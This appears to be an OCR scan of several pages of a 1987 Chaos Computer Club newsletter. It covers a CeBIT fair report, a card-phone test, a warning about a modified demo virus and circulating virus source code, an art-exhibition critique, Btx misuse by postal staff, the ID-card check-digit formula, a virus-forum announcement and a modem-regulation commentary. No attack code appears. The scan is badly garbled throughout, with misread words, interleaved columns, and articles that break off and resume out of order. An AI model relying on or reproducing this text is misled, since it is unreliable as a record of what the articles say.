«thn«. tür dM 6mm httaboQm mmqttvn «wd. iwf 
UmaeriUo MgaMn 


Die Kontonummer für Ubenweisungen ist 59 90 90 - 201 beim Postgirosamt Hamburg, 
Bankleidzahl 20010020, Kontoinhaber ist der Chaos Computer Club e.V. 



UnicrtchrifI 
r B«nHdifg»w 


A* DS Seite 10 


Klartext bitte 
in Druckbuchstaben 


K ^ vnCP -O- ■ 


Messebericht CeBIT 


Aligemein gab es auf der CeBIT in Hannover, dem 
Mekka der Computcrfrcaks, dieses Jahr keine um¬ 
werfende Erfindung oder Neuerung zu sehen. Ideen 
wurden verwirklicht, Produkte verbessert, Kontakte 
geknüpft oder vertieft. Die diesjährige CeBIT stand 
im Lichtedes Fleißes. 

Auf dem Hardwaresektor wurde der gerade gebore¬ 
nen Intel 80386er- Maschinengeneration ein reges In¬ 
teresse entgegengebrachi. Der wohl bemerkenswerte¬ 
ste Vertreter dieser Rechnerart dürfte der neue Apri¬ 
cot XEN-386 sein, der besonders durch seinen Preis 
von knapp 10 KDM incl. 30 M B Harddisk und einem 
MB Hauptspeicher hervorsilchl, dabei jedoch vergli¬ 
chen mit den Konkurrenten keine Lcistungsdefizitc 
aufweist. Tandon verzichtete auf einen 386er, griff 
dafür die Idee der tragbaren Festplatte auf und ent¬ 
wickelte ein Harddisk-Slccksyslem sowie ein Plastik- 
gchäuse, mit dem man den 3,5 Zoll Festplatten- 
Weitwurf schadlos üben kann. Den mil 1.850 US- 
Dollar billigsten 386er wollte eine 1974 gegründete, 
taiwanesische Firma namens IMC an den Händler 
bringen. 

Die Frage, was man denn mit der Rechnerleistung 
der80386ef Maschinen anfangen könne, wo doch das 
gute alte MS-DOS nur 8086er kennt, wurde nun auf 
verschiedene Weisen beantwortet. Eine Mögliche 
Antwort gab ”The Software Link” (bekannt durch 
MuitiLink) mit dem gerade fcrtiggeslclltcn Betriebs¬ 
system PC-MOS/386. Dieses System teilt den Spei¬ 
cher je nach Bedarf der einzelnen Applikationen in 
bis zu 25 virtuelle MS-DOS PC’s auf, von denen ein¬ 
igen oder allen ein Terminal bzw. die Rcchncrkonso- 
lezugeordnet werden kann. Jedes Terminal kann sich 
auf jeden Task aufschalten, sofern es die Zugriffs- 
rcchte besitzt. Die Command-Shell wurde um einige, 
besonders für Programmierer nützliche Kommandos 
erweitert. Bei einer Demonstration konnte ich mich 
davon überzeugen, daß zumindest die gängigsten 
MS-DOS-Programmc auf den Terminals liefen. Für 
Cracker bietet das System keinerlei Angriffspunkte, 
da es ohne Kopierschutz geliefert wird. 

Microsoft wollte zum Thema Protcctcd Mode DOS 
noch keine verwertbaren Informationen herauslas¬ 
sen. 

Bei den Molorolas blieb cs etwas ruhiger in den Ent¬ 
wicklungsabteilungen. Apple bohrte den Mac mit 
einem 68020 auf, Alari versucht es nun mit 4 MB 
Hauptspeicher und einer endlich abgesetzten Tasta¬ 
tur, oh welch Pein ist mir von den Händen genom¬ 
men. Außerdem will Jack den Pcriphericmarkt mit 
einem billigen Laserdrucker, den Videospiel-Markt 
mit einem gestärkten Image, den PC-Marktmit einem 
Ibm-Kompatiblen, und den US-Mark( mit 75 Mega- 
Dollars erobern (”Wir befinden uns ab sofort im 
Krieg.”). Commodorc hat seinen Ideen nur im Sinne 
mannigfaltiger Gehäuse- und Ausstattungsvarianten 
freien Lauf gelassen, 

SntcitW/leMhfr 


Digital Equipment hat unsere unmißverständlichen 
Verlautbarungen endlich erhön und will eine Micro- 
VAX mil zugekleblem Q-Bus und einer (zugegebe¬ 
nermaßen lächerlichen) 40 MB Platte sowie 4 MB 
Hauptspeicher für etwa 20 KDM auf den Hacke- 
ruraworbenen Markt bringen, die MicroVAX 2000. 
Wer von euch auch eine Haben möchte, tue dies 
rechtzeitig kund, damit wir vielleicht im Dutzend bil¬ 
liger kaufen können... Es lohnt sich auf jeden Fall, 
schonmal die bisherige Software von unseren Sattcli- 
len wieder einzusammein und zu archivieren. 

Für die Kommunikatoren werden sich als schwacher 
Trost für die Datex- Gebührenerhöhung bald preis¬ 
werte 2400 baud Vollduplex-Modems etablieren, ein 
erstes wechselte bereits auf der Messe für DM 300,- 
zugunsten eines Hackers den Besitzer. Auch die Post 
plant die Einführung von V.22/V.22 bis Modems zum 
bisherigen Preise des D1200S-12, Eine Nutzungsmö¬ 
glichkeit derselben soll es zunächst für Blödeltcxt, 
später auch für Patex-Dgeben, 

Erstmals Öffnete sich ein Anbieter von High-End 
Graphik- und Animalionsmaschinen dem sterblichen 
Besucher. Bei Symbolics erklärte man bereitwillig je¬ 
dem. was dieses Lisp-Sysiem zu bieten hat: Color Vi¬ 
deo Digitizer, Echtzeitanimation auf beliebig defi¬ 
nierbaren Pfaden, prolessionelle Video-Schnittstelle 
für MA2, Texture Mapping (Das Aufziehen von 
Oberflächenmustem auf einen Körper) und einen 
sehr komfortablen Animations-Edilor/Debuggcr. 
Bei Evans & Sutherland gab man sich bedeckter. 

Das Modethema des Jahres ist Desktop-Publishing, 
fertige Lösungen sind allerdings rar. Der Begriff ver¬ 
sucht das zu beschreiben, was die Redaktion der 
DATENSCH LEUDER seit Bestehen zur Produktion 
nutzt, nämlich die Textgestaltung auf dem Micro- 
computer sowie die Ausgabe auf Laserdrucker oder 
Foiosaubelichicr. 

Witzige Zugangssicherungen haben sich einige An- 
bietervon Sicherheitssystemen ausgedacht: Berechti¬ 
gungsnachweis durch Fingerabdruck. Zusätzlich 
kann auf Kundenwunsch die Fingertemperatur, der 
Puls des Probanden, und die Finger- l^itfähigkeit 
gemessen werden. Das System funktioniert auch 
noch mit einer leichten Verletzung des Fingers, da 
nur etwa fünfzig von hundert Bildpunkten überein¬ 
stimmen müssen. Es können darüberhinaus beliebig 
viele Reservefinger definiert werden. Ob dieses Sy¬ 
stem auch ein Frischgekochtes Abbild aus verdicktem 
Himbecr/Vanille- Pudding akzeptiert, konnte bisher 
nicht geklärt werden, da dem betreffenden Redakteur 
der Pudding mißlang. 

Wie bei jeder CeBIT fand auch diesmal das Traditio¬ 
nelle Hackertreffen am Dienstag auf dem größten 
Poststand statt. Es kamen über hundert Hacker, von 
denen ich wegen Verspätung nur noch etwa zwanzig 
zu Gesicht bekani, um Informationen, Ideen und 
Größe auszutauschen. Von Bayern bis Schleswig- 
Holstein waren die Hacker nach Hangover gepilgert. 
Es wurden Gespräche begonnen, die des Abends in. 
einer wohlgestalteten Kneipe vertieft oder verflacht* 
wurden. 

Das Treffen hat gezeigt, daß viele Hacker zusammen 
mit ihren Maschinen älter und professioneller ge¬ 
worden sind, d.h. in die Industrie Eingeireten sind, 
und der Nachwuchs dünner gesät ist, als zu Beginn 
der hiesigen Hackerkultur. Die Computerwelt hat ein 
wenig von Mythos und Faszination aus der Pionier¬ 
zeit eingebüOt. Das Chaos hat Punkte an die Sachz¬ 
wänge abgegeben. 

Vic 


CEßlTVt9.DOC J9870327 1415 


DS Seite 11 




Kriegserklärung von ATARI 
Eindrücke von der CeBIT’87 



Maschinenlesbares Geld? 

Auf der CeBit’87 gab es viel Neues zu sehen. Sogar 
die Deutsche Bundespest versuchte sich mit neuen 
Technologien. Sie stellte ihr Kartentelefon vor. Es 
gab eine Demokarte mit fünf Einheiten im Wert von 
1,50 MDM (Maschinenlesbare Deutsche Merker). 
Nachdem ich mich gegenüber dem Postler als 
CCC'ler vorgestellt hatte und er den Schock verdaut 
hatte, kam er damit, daß die Karten mit Chips 
(Eproms!) arbeiten und diese ABSOLUT sicher seien. 
Wieder in Hamburg dachte ich mir, man könnte die 
Karte ja mal ausprobieren. Ein Kartentelefon war 
schnell gefunden (ca. 15 Min). Das Telefon nahm 
meine Karte sogar an. Voller Stolz mit so moderner 



Technik umgehen zu können, rief ich einen örtlichen 
Freund an. Nach ca. 1 Chaoseinheit (8 Min.) ver¬ 
nahm ich einen Pfeifton und die Meldung: "Karte 
wechseln”. Als anständiger Bürger meinte ich zum 
Telefon, daß ich noch 4 Einheiten hätte. Ergebnis: 
Die Verbindung wurde unterbrochen und das Tele¬ 
fon behauptete: "Restguthaben 0,00 DM”. Entweder 
hat die DBF die Gebühren heimlich erhöht oder das 
Gerät war von XXXX (Name zensiert). Man stelle 
sich einen normalsterblichen Menschen vor. der sich 
200 Einheiten für 50 DM kauft und sowas erlebt. Der 


Preisverfall im GIPS-Bereich 

Zwar bringt Tramiel die Rechenleisiung einerCRAY 
noch lange nicht im Handheld-Format unter, aber 
eine xx-GIPS-Maschine von SYMBOLICS paßt loc¬ 
ker unter den Schreibtisch. Für deutlich weniger als 
eine halbe Million Dollar lassen sich mit diesem Ge¬ 
rät Bilddaten verarbeiten. 

Bilddaten und Mustererkennung 

Das Auge hat im Verhältnis zur Fläche den wohl 
größten Datendurchsatz. Die nachfolgende Verarbei¬ 
tung ist weitgehend ungeklärt. Immerhin bietet CA¬ 
NON für den Preis eines besseren Foxtrottcls einen 
dort anschiießbaren Bildleser, der eine A4-Seiie mit 
etwa 12 Linien pro Millimeter einliest und mit glei¬ 
cher Auflösung auf einem Laserdrucker ausgibt. 
Außerdem wurde Zeichenerkennung üblicher 
Schreibmaschinenschriften gezeigt. Derzeit ist noch 
unklar, ob diese Zusatzsoftware weniger oder erheb¬ 
lich mehr oder wieviel im Verhältnis zur Hardware 
kostet. Immerhin gibt es Programme, die mehr als das 
SOfache der zugehörigen Hardware kosten. 

Insgesamt ist die maschinelle Erzeugung des beweg¬ 
ten Gesichtsbildcs noch nicht rentabel und ein engli¬ 
scher, mit Sat An empfangbarer Fernsehsender mietet 
einen lebendigen Fernsehsprecher und erweckt durch 
maschinelle Vereckung und massig Schminke den 
Eindruck einer Roboterproduktion (”Max Hea- 
droom”). Das ist billiger als derzeit nicht verfügbare 
Computerkapazität. 

SatAn steht mit großen Buchstaben auf dem Dach 
des ZDF und ist ein eingetragenes Warenzeichen der 
Antennenfirma Kathrein. Mittelalterliche Fürsten 
sperrten einen klapp Yogafähigen guten Schachspie¬ 
ler in einen kleinen Holzkasten mit innengesieuerter 
mechanischer Figurenbewegemechanik, um hohe 
Gäste zu beeindrucken. Im übrigen ist Künstliche In¬ 
telligenz ein Schlagwort, das von vielen benutzt wird, 
die nicht einmal die niedrigste Stufe davon, nämlich 
die Computerviren, begriffen haben. wau 

cebitwl9.doc 12.03. 


wird ja schwarz vor Schilling. 

Abschließend wäre noch zu sagen, daß mir zu Ohren 
gekommen ist, daß die DßP 50.000 NMDM (nicht 
maschinenies. DM) für einen absolut sicheren Chip 
bielet. Die Pest möge dies bitte bestätigen oder de* 
mentieren, denn NMDM ist auch Geld. Wenigstens 
dürfte das Kanentelefon eine glorreich kurze Zu¬ 
kunft haben. 

terra 

87032514262 mshgldiy.doc 


I 



©er 

Uirus 

war 

da 


Der auf dem CCC86 vorgcstellte 
und zwischenzeitlich verbreitete 
MS-DOS Demovirus V1RDEM.COM, der 
ursprünglich nur auf Laufwerk A: 
seine Qualitäten unter Beweis stell¬ 
te, ist jetzt in einer 'Sicherheits¬ 
kopierten' manipulierten Version 
aufgetaucht. Bei der jetzt sicherge¬ 
stellten 'Sicherheitskopie" war die 
Laufwerksbezeichnung auf C: geändert. 
Die Redaktion weist aus diesem Grund 
daraufhin, daß zu Testzwecken ver¬ 
siegelte DemoViren von der Redaktion 
bezogen werden können. Bei Kopien 
von 'Freunden" besteht die Gefahr 
einer bösartigen Verbreitung. 
Weiterhin sind beim CCC neue Viren 
eingegangen. über Hailboxsysteme 
verbreitet sich derzeit der Programni— 
quellcode eines überschreibenden 
Virus in TURBO-PASCAL, Dieser ist 
zwar “primitiv" geschrieben, eignet 
sich aber durch die gute Kommentie¬ 
rung zur Entwicklung weitaus bösarti¬ 
ger PC-Viren. Mehr über Viren im 
nächstem Heft, oder fUr die, die 
nicht warten können auf unserem 
österlichen VirenPorum. 

LS23 - VIREN.Txt 


S>atenStf)Uttiep 


DS Seite 12 


art Her? 




DolcuBienta 1986; Klaus Geldmacher baut 
"ohne Tibel* aus StahJLvinkelprofileii, Ven¬ 
tilatoren, Leuchtröhren, Tonträgern und 
Verstärkern. Kinetik %far eines der Zauber¬ 
worte. Lichtobjekte ein anderes, 
art-ware 1987: Klaus Geldmacher baut "ohne 
Titel* aus Leuchtröhren, Ailgebrauchs- 
lampen, Tonträgern und Verstärkern, und - 
ganz neu - etwas Farbe und allerlei Unrat, 
Kunst und Blektronik heißt jetzt das Zau¬ 
berwort? 

Bochumer Kunstwoche 1973; TV-cello und TV- 
Bett mit Charlotte Moorman und Nam June 
Vaik (die ersten Arbeiten Paiks' mit Moor- 
man und TV-Ceilo stammen aus den 60em) . 
Elektronik-Freaks der späten 80er, ihr 
würdet ausflippen über die alten Arbeiten 
von Paik/Moonoan - wenn ihr sie nicht 
schon kennt 11 

Aber ein schlichtes Video-Bett mit ange- 
steil-tem Kopfteil und Ftiflende auf der 
art-ware 1987? Elektronische Kunst?? Wir 
können natürlich süffisant mit den Achseln 
zucken: “Thematische“ Ausstellungen kennen 
wir aus den letzten 10 Jahren zur Genüge: 
Hir haben zu allen erdenklichen und gegen¬ 
sätzlichen Themen immer wieder die selben 
Arbeiten gesehen, was regen wir uns auf. 
“Kunst tmd Elektronik* also das flockig 
unverfängliche Thema fUr das ausgehende 
achte Jahrzehnt? Und überhaupt nehmen wir 
die Kunst schon lange nicht mehr ernst. 

Und hier fallen mir doch sofort ein paar 
ernste Dinge ein. werden Künstler und 
Ausstellungsmacher denn nicht gewahr, daß 
was sie machen gar nicht mehr wirklich 
ist? Gerade hier • nämlich auf einer 
Industrie-Messe - wo Wirklichkeit sich vor 
uns aufCächert: faszinierend, phanta¬ 

stisch , beängstigend, unvorstellbar, 
brauchbar, codiert, transparent, unbe¬ 
greiflich, käuflich ... hier ist art-ware 
einfach unwirklich. Weil doch gerade hier 
die Chance geboten ist, über weltweite 
Vernetzung (hier sind ja Telefone keine 
Attrappen), elektronische Infrastruktur 
und die Aligegenwart des elektronischen 
Mediums - Kunst und Elektronik? - in die 
wirkliche Wirklichkeit einzugreifenI Statt 
dessen ein bißchen technisierter Bluff für 
einen braven Bürger, der vor der Technik 
mehr Furcht hat als Ahnung von ihr, ein 
bißchen aufgexnotzte Ästhetik aus den 
60em, mehr nicht. Und das mit den techni¬ 
schen Möglichkeiten für morgen? 

Ich frage mich immer wieder, und hier 
besonders: wo leben Künstler (und Ausstel- 
lun gsm acher) ei gentlich, was- ist ihre 
Wirklichkeit? Die Ästhetik vergangener 
Jahrzehnte? Dann können wir unsere Auf¬ 
merksamkeit getrost abwendan von der soge¬ 
nannten Kunst, ohne Schaden zu nehmen. 

Oder soll hier demonstriert werden, anhand 
von schlechten - es ist ein Ja mme r! - und 
verfälschten Beispielen, wie weit schon 
vor ca. zwei Jahrzehnten ein paar Künstler 
beispiellos zu denken bereit waren? Das 
wäre kein schlechter Einfall, könnte man 
doch so vielleicht den Widerwillen gegen 
alles was Kunst heißt nicht nur der jungen 
elektronikverliebten Zeitgenossen ein 
wenig aufweichen. 


Die Frage ist ja gar nicht, ob sich hier 
kleinkrämerhafte Vorstellungen der Aus- 
steilungainacher oder Phantasielosigkeit 
realitätafremder Künstler als Ware ver- 
wirklichenj die Frage ist vielmehr, wo 
sind die "wahren Künstler", die sich die 
Möglichkeiten der Komunikation mittels 
elektronischer Medien längst zu eigen 
gemacht haben, die in den immateriellen 
Räumen der weltweiten und der lokalen 
Netze längst eine neue •Öffentlichkeit“ 
gefunden haben. Auf der art-ware 1987 sind 
sie nicht, auf der CeBit‘87 Ist der eine 
oder andere zu finden. Ihre Arbeit ist 
wenig spektakulär: Kommunikation ist nicht 
stofflich und gar nicht monumental, art- 
ware-Macher scheinen sie gar nicht wahr zu 
nehmen. 



Vielmehr scheinen sie mit dem Hinweis auf 
die "wichtigen Erkentnisse für unser post- 
TECHNOLOGISCHES (WAS IST DAS?) Zeitalter" 
einen rückwärts gewandten Salto Mortale 
zuviel gemacht zu haben: post-technolo¬ 
gisch heißt soviel wie VOM TECHNOLOGIE 
KEINE SPUR, und wir befinden uns wieder - 
oh Wunder - in der akademischen Ästhetik 
der ausgehenden Romantik. Von hier aus 
können wir nun endlich begreifen, warum 
‘Femsehschirmo, Personalcomputer, Video 
UBW. ernst zu nehmende Ausdrucks- und 
Gestaltungsmittel" (so ernst wie Pinsel 
und Heisseil) “einer ganz neuen inter¬ 
nationalen Kunst-Richtung" sind. Und wenn 
wir dann schon mal unserer Zeit weit 
voraus sind, dürfen wir auch noch einen 
Blick in ferne ZuJoinft wagen; Wenn Gerry 
Schümm einmal in den 60em des 20sten 
Jahrhunderts seine “erste" Video-Galerie 
eröffnen wird, so wird es nur Schnee von 
gestern sein, und ebenso wenig wird es uns 
dann beeindrucken, wenn ein gewisser 
Ducheimp im ersten viertel des selben Jh.s 
nicht mehr mit Pinsel und Meiasel aber auf 
Glas arbeiten, dann nur noch Schach spie¬ 
len wird, und - achl, Infra-mince und Yves 
Klein beim Verkauf von immateriellen, 
malerischen Sensibilitätszonen I - und 
erinnern uns wieder an Nam June. Paik... 
Verlassen wir .die Gegenden, in denen 
Künstler versuchen, eine Art Ware aus 
einem heißen Brei zu bereiten, den sie in 
Wirklichkeit aber nur umschleichen xind be¬ 
schwörend immer wieder IST-ZEIT nennen. 
Und, wie schade, jetzt ist schon Zeit 
aufzuhören, weil die Seite zu Ende ist. 

mrina kem 




DS Sette 13 




BildschLrmtext, Hacker 
und kriminelle Postler 



Zwei Hachträga in Jahresbericht des 
Berliner oarenschutzbeauftragtan 
erscheinen der Redaktion berich- 
tenswert. 

*Su den von Hamburger Datenschutz- 
beaufcragcen federführend durchge¬ 
führten Untersuchungen zum spekta¬ 
kulären Fall des Hamburger “Hacker- 
Clubs*, der unter der Identität 
eines Kreditinstitutes für 
135.000,- DM gebührenpflichtige 
Seiten abgerufen hatte, berichtete 
Ich (der Berliner OSB, die Red.} ln 
Vorjahr über den damals als sicher 
geltenden Srkenntnisstand, daß 
unbedachter Umgang mit dem geheimen 
Kennwort ursächlich sei und nicht 
ein Fehler des Btx-Systems. 

Da zwischen dem Redaktionsschluß- 
cemin des Berliner und des Hambur- 
gischen Oatenschutzberauftragten 
zum Jahresbericht 1985 der Bundes- 
beauftragte für den Datenschutz 
aufgrund eines Amtshilfeersuchens 
des Hanburgischen Datenschutz¬ 
beauftragten bei der Prüfung des 
Btx-Systems zu dem Ergebnis gekom- 
nen war, daß ein technischer Mangel 
des Btx-Systems als Ursache nun 
doch nicht auszuschließen war, 
ergab sich somit ein Unterschied 
zwischen der Daztsellung des Ham- 
burgischen Datenschutzbeauftragten 
und meinen Ausführungen, der von 
der Bilschimtext-Fachpresse als 
Meinungsunterschied interpretiert 
wurde. Selbstverständlich ist die 
Darstellung des Hamburgischen 
Datenschutzbeauftragten letzter 
Stand der Angelegenheit.“ 

Der CCC wird den vollständigen 
Uncersuchungsberleht des Kanbur- 
gischen Datenschutzbeauftragten in 
der MackerbLbel Teil II zun ende 
dieses Jahres abdrucken. Ende. 

Eine zweite “Hackemeldung* findet 
sich in Bericht des Berliner 
Oatenschützers nur eine Leerzeile 
tiefer. 

"In _dein_ini letz ten . Jahresbericht 
erwähnten Fall eines Berliner Teil¬ 
nehmers, unter dessen Teilnehocr- 
kennung ein Dritter gebührenpflich¬ 
tige Seiten aufgerufen hatte, weil 
er sich dem System gegenüber als 
freizügig (sowas wie ein blinder 
Portier, d.Red.) deklariert hatte 
und unbedachter Umgang mit dem 
Kennwort nicht auszuschllessen war, 
haben die staatsanwaltschaftlichen 
Ermittlungen anhand der Überprüfung 
der Protokolle über die Systenuiut- 
zung ergeben, daß der unbefugte 
Zugriff unter falscher Kennung über 
ein Terminal erfolgte, welches in 
Bereich einer Femsprachentstö- 
rungsstelle der Deutschen Bundes¬ 
post in Berlin aufgestellt war. Dia 
Identität des Täters selbst konnte 
jedoch bisher nicht ermittelt wer¬ 
den . ■ 

Dieses ist nicht der einzige uns 
bekannte Fall, bei dem Postlern 
(und nur solche haben zu bestimmten 
Räumen und Informationen Zutritt) 
ein grob fahrlässiger, Ja sogar 
teilweise krimineller weise, Umgang 
mit vertraulichen Informationen 


Getaoe im suge aer tincuncung von 
ISDN, welches.noch weit mehr Mani- 
pulations und Protokollmöglichkei¬ 
ten bietet, gewinnt diese Frage 
eine existenzielle Qualität. 

Der waschnaschinenfeste 
Personalausweis 


Kaiua jemandem dürfte entgangen 
sein, daß seit dem 1. April von den 
pexsonalausweisbehörden der neue 
maschinenlesbare Personalausweis 
ausgegeben wird. Diejenigen, die im 
März einen Waschtag einlegten und 
auf den letzten Drücker noch einen 
der Papplappen ergatterten haben 
(sollte der Ausweis einem Ordnungs¬ 
hüter nicht in den Dreck fallen) 
bis 1992 Ruhe. Der Rest darf sich 
freuen. 

Beim neuen Ausweis entfällt zu¬ 
nächst das Ausfüllen eines Antrags 
durch den Bittsteller, dieses wird 
von der Personalausweisbehörde (oft 
die Meldeämter) übemomnen. Zu¬ 
nächst wird im Antrag gekennzeich¬ 
net ob der Bürger "schreibkundig“ 
oder “sehreibunkundig" ist. Dieses 
muß man ja wissen, da “schreib¬ 
unkundige* ja den Ausweis nicht 

unterschreiben können. 

Folgend wird das Passbild (gemessen 
vom Haaransatz bis zur Kinnspitze 

in einer Höhe von 20 bis 25inni) 

möglichst schwarz/weiß mit einem 

helleren Hintergrund in Fortmac 35 
X 43 Ron entgegengenommen. 

Der Antrag wird daraufhin mit einer 
Schreibmaschine (Schrift OCR- Bl, 
Tipp-Ex erlaubt) ausgefüllt. Oabel 
müssen folgende Felder ausgefUIlt 
werden: SecXennummer, Antragsdatun, 
Familienname, vomane(n), Geburts¬ 
tag, Geburtsort, Wohnort (Haupt- 
wahnaitz), Größe und Augenfarbe. 
Weiterhin sollen folgende “Kann- 
Felder* ausgefüllt werden, wenn 
.entsprechende persönliche Daten 
vorliegend Geburtsnane, Poatamscbe- 
reich, Wohnung, Hausnummer, Ordens- 
nams/Künstlemajne. Fehlen diese 
Daten bleiben die Felder leer. Bei 
diesem ganzen AusfUllen werden die 
Ausnahmefälle in der Schreibweise 
(Akzente und Sonderzeichen] geson¬ 
dert behandelt und verarbeitet. 

Oie “Serlennummer“ hat eine Länge 
von 10 Ziffern. Vier Ziffern sin d 
für die Behdrdenkennzahl, weitere 
fünf die laufende Hummer und eine 
Ziffer als Prüfziffer. Die Prüfzif¬ 
fer wird wie folgt berechnet: Mul¬ 
tiplizieren jeder Ziffer der Behör¬ 
denkennzahl und der laufenden Num¬ 
mer, beginnend mit der ersten Zif¬ 
fer, mit den Faktoren 731731731 auf 
der Basis von Modul 10 (1. Ziffer 

mal 7, zweite mal 3, usw). Dann 
Addieren der neun Blnzelprodukte. 
Dividieren der Summe durch 10. 
Verbleibt bei der Division ein 
Rest, so ist dieser die Prüfziffer; 
verbelibt kein Rest, so lautet die 
Prüfziffer 0. 

Dann werden die Anträge, bis zu 10 
Stück, in einer Kunstoffhülle ver¬ 
sandt. Der fertige Ausweis kann 
dann wenige Tage später unter¬ 
schrieben und abgeholt werden. 
Frankreich hat sich im Gegensatz 
zur Bundesrepubllck, gegen die Ein¬ 
führung eines maschinenlesbaren 
Ausweises entschieden. oemokra- 


Ostem '87 in Hamburg 


II. VirenForum und 
Mitgliederversammlung 



Zu Ostern, genauer am 13. und 
19. April treffen sich in Kaaburg 
Hacker, Freaks und Datenreisende zu 
einem Arbeitstreffen. Neben einem 
Workshop über ConputerViren, der 
nichterörterta Bereiche des viren- 
Forums vom CCC'Bß vertiefen soll, 
trifft man sich zun Infomatlonsaus- 
tausch sowie zur 1. Mitgliederver- 
aamfnlimg des CCCeV. Veranstaltungsort 
ist wieder das Bldelstedter Bürger¬ 
haus jClbgaustcafle 12, Hamburg 54), 
jedoch nicht in der räumlichen Größe 
der CC-Congresse. Angemietet wurden, 
ab Samstag morgen bis Sonntag abend, 
nur die Aula sowie das Cafe und ein 
weiterer Konferenzraum - auf Technik 
wird weitgehexKi verzichtet. 

Die Teilnahmemöglichkeiten sind somit 
auf ca 100 Personen begrenzt. 

Geplant ist: 

Freitag 17, April - Anreisetag für 
Interessierte - Obemachtungsmög- 
lichkeiten möglichst privat besorgen - 
Zeit für private Gespräche. 

Samstag 18. April - ab 10 Uhr Ein¬ 
treffen der Hamburger Crew zwecks 
Einrichtung der Räume - somit ab 
12 Uhr Eintreffen der Teilnehmer des 
Vizenforxms - ab 14 Uhr Vorgespräche 
und fescLegen des Abiaufplanes (der 
genaue Ablauf richtet sich nach den 
Interessen der Teilnehmenden Per¬ 
sonen) - dann Workshops bis ca 
18 Uhr. 

Samstag 18‘. April - ab 20 Uhr Mit¬ 
gliederversammlung des CCCeV ln 
der Aula, der übliche Veceinskra» 
sowie Diskussionen über die Zukunft 
des Vereines, bis in die Nacht. 

Sonntag 19. April - ab 12 Uhr 
Weiter-führung der Workshops des 
VtrenForuma bis circa 16 Uhr - 
anschliessend Aufräumen und Übergabe 
der Räumlichkeiten - folgend Zeit 
für private Gespräche. 

Mitglieder des CCCeV, die ihre Bei¬ 
träge bezahlt haben, bra uchen sich 
nicht anzumeiden und zahlen auch 
keine TeilnahmegebUhr - von allen 
anderen wird erwartet, daß sie 
DM 10,- auf unser Postgirokonto 
(599090-201, Postgiros Hamburg, 

BLZ 20010020] unter dem Stichwort 
“FORUM* zur Anmeldung bis zun 
15. April einzahlen und den Beleg 
mitbringen. Gebt bitte Eure Telefon- 
nuaer an, damit eventuell vorberei¬ 
tend Gespräche geführt werden können. 

Der CCC hofft auf eine ruhige, nicht 
zu chaotische Veranstaltung, 
übemachtungsplätze sollten privat 
besorgt werden, sonst kann auf die 
Jugendherberge (Stintfang) zurückge-' 
griffen werden. Verpflegung ist nicht 
geplant (Ausnahme Kaffee). Bringt 
gute Laune mit, und sollten noch 
Fragen unbeantwortet sein, ruft 
Steffen unter 040-483752 oder die 
CCC Geschäftsstelle unter 
040-4903757 an. 


(Zugangsberechtigungen, Manipula- tische Systeme benötigen einen 
tionsmöglichkeiten) nachzuweisen Freiraum, der Hiedertstand gegen 
ist. Dia Redaktion erbittet Hin- faschistische Tendenzen noch ermög- 
weise von den Lesern um in dieser licht. Aber wir Deutschen waren ja 
Sache weitere Recherchen anzustel- schon immer etwas gründlicher. Die 
len. Es stellt sich die Frage, ob Folgen dieser effektiven Kontroll- 
die Bundespost überhaupt ein möglichkeit werden wir in wenigen 
Bewußtsein um den Datenschutz hat? Monaten zu spüren bekommen. 




Kommentar: 


Strategien der Deutschen Bundespost 



Die DBP erweckt den Eindruck, ihre Monopolstel¬ 
lung wäre aufgehoben. Die Deutsche Bundespost 
entwickelte geschickt eine Intrige auf dem Schlacht¬ 
feld des deutschen Modemmarktes. Bis Ende 1986 
durfte man nur Modems der DBP am öffentlichen 
Fernsprechnetz betreiben, jedoch im Bereich der in¬ 
ternationalen Mietleitungen gewährte sie den Betrieb 
von leilnchmereigenen Modems, soweit diese über 
eine allgemeine F^Z-ZuIassung (jetzt 21ZF-Zul.) ver¬ 
fugten. Die deutschen Modemanwender ertrugen 
diese Last mit trauerndem Blick auf die Marktlibera- 
Itsiening der europäischen Nachbarstaaten und in 
den USA. Der EG fiel schon früh diese Marktverzer- 
ning der DBP, zugunsten ihres Monopols ins Auge, 
und sie berief eine Brüssler EG-K.ommision ein, um 
sich näher mit diesem Phänomen zu befassen. 

Unter dem ständigem Druck der EG-K.ommission 
und bedroht von einem Gerichtsverfahren konterte 
die DBP mit einem Kompromißvorschlag, der eine 
Liberatlsienjng des Modemmarktes in Aussicht stell¬ 
te. Der Postverwaltungsrat lehnte allerdings diesen 
Vorschlag am 30. Juni 1986 mit der Begründung ab, 
es sei nicht eindeutig geklärt, in welcher Weise die 
EG Einfluß auf die Posipolilik nehmen dürfte. Dies 
ist verständlich: der Postverwaltungsrat setzt sich aus 
Vertretern der Industrie zusammen, die wie z.B. Sie¬ 
mens als Hoflieferant der DBP um ihr Modem-Mo¬ 
nopol fürchten. Das Bundeskabinett überstimmte je¬ 
doch am 16. Juli 1986 den Postverwaltungsrat und 
ebnete somit den Weg für die 30.,Änderungsverord- 
nung zur Femmeldcordnung (30.ÄndVFO). Diese ist 
nun seit dem I . Dezember 1986 rechtskräftig. 

Nach der 30. ÄndVFO ermöglicht die DBP den Ein¬ 
satz von privaten und vor allen Dingen teilnehmerei- 
genen Modem’s. die, un d hieri n liegt der Haken, wei¬ 
terhin an die allgemeine FTZ-Zulassung(-ZZn ge¬ 
bunden sind. 

Ais wahre Täuschungen entpuppen sich djese klug 
formulierten Fachspeziflkationen der 30. ÄndVFO: 
Es existieren vorerst (bis Ende 1987?) noch gar keine! 
So dürfen baugleiche Modems von Herstellern, die 
für die Post produzieren, nicht am Öffentlichen Fern¬ 
sprechnetz eingesetzt werden, da die Zulassung man¬ 
gels Vorschriften nicht erfolgen kann. 

Der Markt staunt hingegen, mit welcher Kühnheit die 
DBP noch rechtzeitig zur CeBit '87 die Zulassungs¬ 
bedingungen für eine der Steinzeit in der Datenkom¬ 
munikation entsprechende Übertragungsnorm, der 
V26bis ankündigt. Unter die V26bis Norm fallen alle 
Modems, die der Gcschwindigkeitsklasse von 2400 
und 1200 Baud mit Hilskanal angehören. Diese 
Norm Ist mittlerweile Vergangenheit. Die DBP argu¬ 
mentiert zwar immernoch mit dem Einsatz der V26bis 
bei BTX als Standard, jedoch überzeugt ein kurzer 
Blick in die USA vom Gegenteil. Dort wird bereits 
seit rund zwei Jahren mit 2400 Baud vollduplex über 
das konventionelle 2-Draht Fernsprechnetz gehackt. 
Der Markt wirkt völlig irritiert und fragt sich, ob 
schon wieder die Absicht der DBP besteht, eine neue 
Technologie zu verschlafen bzw. welche Gründe hin¬ 
ter dem Modem-Spcktakel stehen. 


Ganz behutsam wirbt die DBP bereits für ihre neuen 
